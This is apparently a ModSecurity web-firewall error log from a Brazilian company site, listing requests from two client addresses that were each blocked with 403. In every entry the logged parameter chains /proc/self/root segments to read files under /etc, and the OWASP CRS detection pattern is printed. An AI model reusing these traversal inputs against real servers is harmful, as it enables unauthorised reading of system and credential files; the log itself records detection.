https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:11.536568 2026] [:error] [pid 1210:tid 140411683178240] [client 74.7.243.203:50088] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAalKJy4A1bGlmj9BQKwAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:11.539755 2026] [:error] [pid 11469:tid 140411658000128] [client 74.7.241.46:60416] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAa5DEJR9VXonE_-1JAgAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:52:12.863424 2026] [:error] [pid 11469:tid 140411548894976] [client 74.7.243.203:41422] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/grep_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAbJDEJR9VXonE_-1JBAAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:14.117037 2026] [:error] [pid 11469:tid 140411641214720] [client 74.7.241.46:58184] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAbpDEJR9VXonE_-1JBwAAAQw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:14.226840 2026] [:error] [pid 1961:tid 140411641214720] [client 74.7.243.203:41438] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAbnRXaaWotPICgYsfkAAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:15.481111 2026] [:error] [pid 7000:tid 140411632822016] [client 74.7.243.203:41454] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAbxePVOt35XCGZP8q5gAAA40"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:16.797140 2026] [:error] [pid 2325:tid 140411582465792] [client 74.7.243.203:41460] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAcO82sZHvlq4xgHq99wAAApM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:18.095310 2026] [:error] [pid 2325:tid 140411574073088] [client 74.7.243.203:41472] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAcu82sZHvlq4xgHq9-AAAApQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:19.483492 2026] [:error] [pid 7000:tid 140411649607424] [client 74.7.243.203:41482] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAcxePVOt35XCGZP8q6gAAA4s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:20.827425 2026] [:error] [pid 2325:tid 140411733534464] [client 74.7.243.203:53302] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAdO82sZHvlq4xgHq9-wAAAoE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:22.159138 2026] [:error] [pid 11293:tid 140411607643904] [client 74.7.243.203:53312] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAdtCmCSWTlPouqorGdwAAANA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:23.498755 2026] [:error] [pid 1961:tid 140411565680384] [client 74.7.243.203:53314] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAd3RXaaWotPICgYsflgAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:24.283066 2026] [:error] [pid 7000:tid 140411674785536] [client 74.7.241.46:58188] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAeBePVOt35XCGZP8q7wAAA4g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:52:24.793067 2026] [:error] [pid 2305:tid 140411607643904] [client 74.7.243.203:53316] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAeAQohV2v-7oj5HH17QAAAZA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:26.067358 2026] [:error] [pid 2305:tid 140411641214720] [client 74.7.243.203:53326] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAegQohV2v-7oj5HH17gAAAYw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:27.407303 2026] [:error] [pid 2473:tid 140411725141760] [client 74.7.243.203:53336] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAe6BJNF7axNlVR0X3-wAAAAI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:28.595199 2026] [:error] [pid 1210:tid 140411641214720] [client 74.7.243.203:53346] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAfFKJy4A1bGlmj9BQLQAAAkw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:29.923335 2026] [:error] [pid 1961:tid 140411632822016] [client 74.7.243.203:53356] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAfXRXaaWotPICgYsfmgAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:31.081886 2026] [:error] [pid 1210:tid 140411658000128] [client 74.7.243.203:52568] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAf1KJy4A1bGlmj9BQMAAAAko"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:32.408078 2026] [:error] [pid 2305:tid 140411616036608] [client 74.7.243.203:52576] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAgAQohV2v-7oj5HH19AAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:33.545200 2026] [:error] [pid 2305:tid 140411725141760] [client 74.7.243.203:52580] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAgQQohV2v-7oj5HH19gAAAYI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
